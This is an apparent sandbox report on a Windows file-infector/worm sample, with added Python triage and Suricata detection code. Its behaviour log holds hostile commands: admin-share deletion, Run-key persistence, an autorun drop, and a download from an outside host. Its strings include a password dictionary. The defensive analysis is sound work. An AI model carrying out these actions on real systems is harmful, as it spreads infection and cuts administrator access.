Analysis Date: 2015-04-08 15:25:08
MD5: fdc8a5660eed7c371980bac0c32f05d0
SHA1: 687d5e3134660468c6ad557464f12012c6901ef2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .nsp0 md5: 32608f15bb53b440ddb449a4043106ff sha1: 5c3df26af5e917abfe2690813c1cbaccfcc824a5 size: 360448
Section .nsp1 md5: d613031d58fd2da5d1553f55b86171e3 sha1: d384e39f9cefd75ff0e9c2c545315a6c15540491 size: 77824
Section .nsp2 md5: 04d7b0e264aaed912ed69ddc02fd548b sha1: defdabfea6aaf7611b92f44998ae853b36a245cc size: 12800
Timestamp: 1992-06-19 22:22:17 (the fixed link timestamp that Delphi-built binaries carry, not a build time)
Packer: Borland Delphi v6.0 - v7.0 (compiler signature; the .nsp0/.nsp1/.nsp2 section names are NSPack's, consistent with the MalwareBytes verdict below)
PEhash: c3e21b43c3c5c3db09ebbe25b4f4f809d8c9b002
IMPhash: c2045910afd28c799c236e97ee085dec
AV 360 Safe: no_virus
AV Ad-Aware: Backdoor.Hupigon.AYGZ
AV Alwil (avast): Rootkit-gen [Rtk]:Imponex [Wrm]
AV Arcabit (arcavir): Backdoor.Hupigon.AYGZ:Rootkit.Agent.AIZZ
AV Authentium: W32/Rootkit.LIUE-0684
AV Avira (antivir): Rkit/Small.AN
AV BullGuard: Backdoor.Hupigon.AYGZ
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Rootkit.Small.ef.n3
AV ClamAV: Win.Trojan.Rootkit-4869
AV Dr. Web: Win32.HLLP.Whboy.99 - infected, incurable
AV Emsisoft: Backdoor.Hupigon.AYGZ
AV Eset (nod32): Win32/Fujacks virus
AV Fortinet: W32/Agent.LF!worm.p2p
AV Frisk (f-prot): W32/Rootkit.CKZ
AV F-Secure: Backdoor.Hupigon.AYGZ
AV Grisoft (avg): PSW.Generic8.BBX.dropper
AV Ikarus: Rootkit.Win32.Small
AV K7: Trojan ( 003bc76d1 )
AV Kaspersky 2015: Trojan.Win32.Generic
AV MalwareBytes: Packed.NSPack
AV Mcafee: W32/Fujacks.az
AV Microsoft Security Essentials: Virus:Win32/Viking.gen!B
AV MicroWorld (escan): Backdoor.Hupigon.AYGZ
AV Rising: Win32.BMW.n
AV Sophos: no_virus
AV Symantec: Suspicious.DLoader
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.Rootkit.Gamepass.01309

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system32\drivers\TXPlatform.exe
Creates Process: C:\WINDOWS\system32\drivers\TXPlatform.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Shell.CMruPidlList

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList
Winsock DNS: www.52cps.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Process: net share C$ /del /y

Process
↳ cmd.exe /c net share E$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Process: net share admin$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Process: net share admin$ /del /y

Process
↳ cmd.exe /c net share E$ /del /y

Creates Process: net share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: _SHuassist.mtx
Creates Mutex: Shell.CMruPidlList

Process
↳ cmd.exe /c net share C$ /del /y

Creates Process: net share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat

Process
↳ C:\WINDOWS\system32\drivers\TXPlatform.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝ C:\WINDOWS\system32\drivers\TXPlatform.exe\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝ "C:\Program Files\InternetExplorer\iexplore.exe" -nohome
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝ 128
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝ NULL
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\90$$.Ico
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\73$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Desktop_1.ini
Creates File: C:\temp\run\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\Desktop_1.ini
Creates File: C:\autorun.inf
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\Desktop_1.ini
Creates File: C:\autorun.inf
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Font\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\80$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\Desktop_1.ini
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: C:\Program Files\Adobe\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\Desktop_1.ini
Creates File: C:\Program Files\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\Desktop_1.ini
Creates File: C:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates File: c:\QQ.sys
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\19$$.Ico
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\Desktop_1.ini
Creates File: C:\temp\logs\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\Desktop_1.ini
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.Ico
Creates File: C:\temp\Desktop_1.ini
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Desktop_1.ini
Deletes File: c:\QQ.sys
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\19$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\90$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\73$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\59$$.Ico
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\80$$.Ico
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates Process: cmd.exe /c net share E$ /del /y
Creates Process: cmd.exe /c net share C$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Process: cmd.exe /c net share E$ /del /y
Creates Process: cmd.exe /c net share C$ /del /y
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Service: RESSDT - c:\QQ.sys
Winsock URL: <html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URL: http://www.52CPS.COM/goto/down.txt

Process
↳ net share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Process: net1 share admin$ /del /y

Process
↳ net share admin$ /del /y

Creates Process: net1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Process: net1 share E$ /del /y

Process
↳ net share C$ /del /y

Creates Process: net1 share C$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ Pid 1024

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1864

Process
↳ Pid 1136

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ net1 share admin$ /del /y

Process
↳ net1 share admin$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates File: PIPE\srvsvc

Process
↳ net1 share C$ /del /y

Creates File: PIPE\srvsvc
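
The runtime log above carries the indicators a responder acts on: the copy dropped as C:\WINDOWS\system32\drivers\TXPlatform.exe (an .exe in the drivers directory) and registered under HKCU\...\CurrentVersion\Run\Explorer; C:\autorun.inf plus Desktop_1.ini written into every directory walked; existing executables under Program Files (AcroRd32.exe, setup.exe) rewritten, consistent with the PE_Infect string in the binary; c:\QQ.sys loaded as service RESSDT and deleted again afterwards; the C$, E$ and admin$ shares removed with net share ... /del /y; the Explorer "Show hidden files" value (SHOWALL\CheckedValue) overwritten; and NoDriveTypeAutoRun set to 128. That last value is the interesting one: 128 is 0x80, only the "unknown drive type" bit, so AutoRun remains enabled for removable, fixed, network and CD-ROM drives, which is what the autorun.inf drop depends on; the hardened value is 0xFF (AutoRun disabled everywhere). The triage script below is an added example written for this page and is not the sandbox's own tooling. SAMPLE_LOG is copied from the report above (the trailing NUL escape on the Run value dropped); the category names and the bit table for NoDriveTypeAutoRun (as documented by Microsoft) are the example's own.

```python
"""Triage of the sandbox's behaviour lines (added example, not from the report).

SAMPLE_LOG is copied from the report above; category names are this example's
own. NoDriveTypeAutoRun bit layout as documented by Microsoft: a SET bit
disables AutoRun for that drive class.
"""
from __future__ import annotations
import re
from collections import defaultdict

SAMPLE_LOG = """\
Registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Explorer ➝ C:\\WINDOWS\\system32\\drivers\\TXPlatform.exe
Registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDriveTypeAutoRun ➝ 128
Registry: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue ➝ NULL
Creates File: C:\\WINDOWS\\system32\\drivers\\TXPlatform.exe
Creates File: C:\\autorun.inf
Creates File: C:\\Program Files\\Desktop_1.ini
Creates File: c:\\QQ.sys
Creates Service: RESSDT - c:\\QQ.sys
Creates Process: cmd.exe /c net share admin$ /del /y
Creates Process: cmd.exe /c net share C$ /del /y
Deletes File: c:\\QQ.sys
Winsock DNS: www.52cps.com
Winsock URL: http://www.52CPS.COM/goto/down.txt
"""

# The report prints "<event kind><value>"; the colon is optional so that both
# the raw and the cleaned-up form of the lines parse.
LINE_RE = re.compile(
    r"^(Creates File|Deletes File|Creates Process|Creates Service|Creates Mutex|"
    r"Registry|Winsock DNS|Winsock URL):?\s*(.*)$")

AUTORUN_BITS = {0x04: "removable", 0x08: "fixed", 0x10: "network",
                0x20: "cdrom", 0x40: "ramdisk", 0x80: "unknown"}
HARDENED_AUTORUN = 0xFF   # AutoRun disabled on every drive class


def autorun_enabled_drives(value: int) -> list:
    """Drive classes on which AutoRun stays enabled for a given policy value."""
    return [name for bit, name in AUTORUN_BITS.items() if not value & bit]


def triage(log_text: str) -> dict:
    """Group behaviour lines into the indicators a responder acts on."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        kind, value = m.group(1), m.group(2).strip()
        low = value.lower()
        if kind == "Registry":
            key, _, data = value.partition("➝")
            key, data = key.strip(), data.strip()
            klow = key.lower()
            if "\\currentversion\\run\\" in klow:
                findings["persistence"].append(f"{key} = {data}")
            elif klow.endswith("\\nodrivetypeautorun"):
                try:
                    enabled = autorun_enabled_drives(int(data))
                except ValueError:
                    enabled = ["<unparsed: %s>" % data]
                findings["autorun_policy"].append(
                    "AutoRun left enabled on: " + ", ".join(enabled))
            elif klow.endswith("\\hidden\\showall\\checkedvalue"):
                findings["hide_files"].append(key)
        elif kind == "Creates File":
            if low.endswith(("\\autorun.inf", "\\desktop_1.ini")):
                findings["autorun_drop"].append(value)
            elif low.endswith(".sys"):
                findings["driver_drop"].append(value)
            elif low.endswith(".exe") and "\\drivers\\" in low:
                findings["exe_in_drivers_dir"].append(value)
        elif kind == "Deletes File" and low.endswith(".sys"):
            findings["driver_cleanup"].append(value)
        elif kind == "Creates Service":
            findings["driver_service"].append(value)
        elif kind == "Creates Process":
            # net / net1 share <name>$ /del ...: administrative share removal
            if re.search(r"\bnet1?\s+share\s+\S+\$\s+/del\b", low):
                findings["share_removal"].append(value)
        elif kind == "Winsock DNS":
            findings["network"].append(value)
        elif kind == "Winsock URL" and low.startswith(("http://", "https://")):
            findings["network"].append(value)   # skips the 404 body the report logged as a URL
    return dict(findings)


if __name__ == "__main__":
    for category, items in triage(SAMPLE_LOG).items():
        print(category)
        for item in items:
            print("   ", item)
```

Feed it the whole Runtime Details section and the output is the IOC list for the host: the Run value and dropped driver for eradication, the share removal as a sign that remote administration over C$/admin$ has been cut off, and any NoDriveTypeAutoRun value below 0xFF as a policy finding to revert.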

Network Details:

DNS: www.52cps.com
Type: A
141.8.225.80
HTTP GET: http://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
Flows TCP: 192.168.1.1:1040 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f676f74 6f2f646f 776e2e74   GET /goto/down.t
0x00000010 (00016)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 20457272 436f6465   r-Agent: ErrCode
0x00000030 (00048)   0d0a486f 73743a20 7777772e 35324350   ..Host: www.52CP
0x00000040 (00064)   532e434f 4d0d0a43 61636865 2d436f6e   S.COM..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..
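
The hex dump above is the only capture on the page, and it is enough to build a network signature from. The Python below is an added example, not part of the report or the sandbox's tooling: it decodes the dump back into bytes (checking the offsets as it goes), parses the HTTP request, and flags what makes this request stand out: a bare User-Agent of ErrCode (a string that also appears in the binary's string table), none of the Accept headers a browser sends, and a fetch of a plain-text tasking file, /goto/down.txt. RAW_PCAP is copied verbatim from the dump; the anomaly checks, the Suricata rule template and its sid are this example's own assumptions.

```python
"""Decode the report's Raw Pcap dump and inspect the HTTP request.

Added example, not part of the original report. RAW_PCAP is copied verbatim
from the dump above; the anomaly checks and the Suricata rule template (and
its sid) are this example's own assumptions.
"""
from __future__ import annotations
import re

RAW_PCAP = """\
0x00000000 (00000)   47455420 2f676f74 6f2f646f 776e2e74   GET /goto/down.t
0x00000010 (00016)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 20457272 436f6465   r-Agent: ErrCode
0x00000030 (00048)   0d0a486f 73743a20 7777772e 35324350   ..Host: www.52CP
0x00000040 (00064)   532e434f 4d0d0a43 61636865 2d436f6e   S.COM..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..
"""

# "<hex offset> (<decimal offset>)   <hex words, single-spaced>   <ascii column>"
# The hex area ends at the first run of two or more spaces (or end of line),
# which keeps hex-looking characters in the ASCII column from being decoded.
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+)\s+\(\d+\)\s+(.*?)(?:\s{2,}|$)")

BROWSER_UA_MARKERS = ("mozilla/", "opera/", "msie")
BROWSER_HEADERS = ("accept", "accept-language", "accept-encoding")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the payload, checking each line's offset against bytes so far."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"dump gap: expected offset {len(out)}, got {offset}")
        out += bytes.fromhex(m.group(2).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, val = h.partition(":")
        headers[name.strip().lower()] = val.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def request_anomalies(req: dict) -> list:
    """What a hunter would flag on this request."""
    issues = []
    ua = req["headers"].get("user-agent", "")
    if not ua:
        issues.append("no User-Agent")
    elif not any(mark in ua.lower() for mark in BROWSER_UA_MARKERS):
        issues.append(f"non-browser User-Agent '{ua}'")
    missing = [h for h in BROWSER_HEADERS if h not in req["headers"]]
    if missing:
        issues.append("missing browser headers: " + ", ".join(missing))
    if req["target"].lower().endswith(".txt"):
        issues.append("plain-text tasking fetch: " + req["target"])
    return issues


def suricata_rule(req: dict, sid: int) -> str:
    """Constructed signature pinning the User-Agent and URI seen in the capture."""
    ua = req["headers"].get("user-agent", "")
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any ('
        f'msg:"Downloader with User-Agent {ua}"; flow:established,to_server; '
        f'http.user_agent; content:"{ua}"; nocase; '
        f'http.uri; content:"{req["target"]}"; '
        f'sid:{sid}; rev:1;)'
    )


if __name__ == "__main__":
    request = parse_http_request(hexdump_to_bytes(RAW_PCAP))
    for issue in request_anomalies(request):
        print("-", issue)
    print(suricata_rule(request, 1000001))
```

The User-Agent match is the durable part of the rule: the host name and path can change between samples, while a hard-coded string in the binary (ErrCode is in the string table above) tends to survive repacking.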


Strings
.-
\
-
 
 
 
@
.
.,..
`
.
.
.
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Bitmap image is not valid
Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Canvas does not allow drawing Clipboard does not support Icons
Control-C hit
December
Division by zero
DVCLAL
$Error creating variant or safe array)Variant or safe array index out of bounds
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Icon image is not valid!Cannot change the size of an icon
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid argument to date encode
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
Out of system resources
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unexpected variant error
Variant or safe array is locked
Variant overflow
Write
                                                                
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
000000
0123456789ABCDEF
}_?0iE
111111
11111111
121212
123123
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
.14=uU
1B$lje
1Kill_Unit
@1.M$7
1PE_Infect
27hve.Z`
; ;&;,;2;8;>;D;J;P;V;\;b;h;
360safebox.exe
360Safe.exe
360tray.exe
3Messages
/4;2})a
4sSm-jPw
"4<]Y^R
5201314
\5;22jF
5,595Z5y5
6*$,0=
654321
;$]]`7"
7EUPd-
&7"	,Q
"#7Xq8]
88888888
8>J=vbFN
8ngtejd&wub;&ourt=.)spv(15BVW)BII(fiph.ki)Iri%!qmcun97!nanfnp:188(h`vflc:
901100
-96L=Z
@@9A	@J
*9_gOS
9l$\w_
)A2Yo:
 ,a6rZ[x
abc123
admin$
admin123
administrator
Administrator
advapi32.dll
ADVAPI32.DLL
